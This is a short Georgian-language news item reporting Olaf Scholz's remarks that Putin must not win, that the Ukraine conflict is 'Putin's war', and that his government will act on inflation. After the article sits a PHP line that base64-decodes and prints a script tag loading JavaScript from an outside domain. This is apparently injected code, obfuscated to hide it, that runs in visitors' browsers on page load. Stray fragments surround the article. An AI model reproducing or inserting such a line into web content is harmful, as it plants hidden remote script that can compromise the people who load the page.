celsiusi
ავერსი შნაიდერი
გერმანიის კანცლერის, ოლაფ შოლცის თქმით, პუტინმა არ უნდა გაიმარჯვოს. ამის შესახებ განცხადება შოლცმა მოქალაქეებთან შეხვედრისას გააკეთა.
 
ამასთან, გერმანიის მთავრობის მეთაურმა უკრაინაში მიმდინარე საბრძოლო მოქმედებებს „პუტინის ომი“ უწოდა.
 
„მიზანი უცვლელია, რომ პუტინმა არ გაიმარჯვოს. უკრაინის სუვერენიტეტი და ტერიტორიული მთლიანობა დევს ფსონზე. პრეზიდენტმა ბაიდენმა მკაფიოდ თქვა, რომ აშშ არ მიაწვდის უკრაინას ისეთ შეიარაღებას, რომელიც კიევს რუსეთის ტერიტორიაზე დარტყმების მიტანის საშუალებას მისცემს. ჩემი აზრით, ეს არის პრინციპი, რომელსაც ყველა უნდა დაექვემდებაროს. ჩვენ ყოველთვის ვაკვირდებით, სხვები რას აკეთებენ. რაც შეეხება საკითხს, რომელიც ახლა განიხილება, ვიზების გაცემის საკითხს, ყოველთვის შეიძლება, დეტალებს შეხედო და გაუგო რუსეთის მეზობელ სახელმწიფოებს. მაგრამ, ეს პუტინის ომია და არა რუსების. განზოგადება არასდროს არ უნდა მოხდეს”, – განაცხადა გერმანიის კანცლერმა.
 
შოლცმა ასევე ისაუბრა გერმანიაში ფასების ზრდაზე და თქვა, რომ მთავრობა ინფლაციის შესამცირებლად კონკრეტულ ნაბიჯებს გადადგამს. მისივე თქმით, გერმანიის ხელისუფლება ასევე მუშაობს ბიზნესის მხარდასაჭერად გარკვეული ზომების მიღებაზე.
472
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");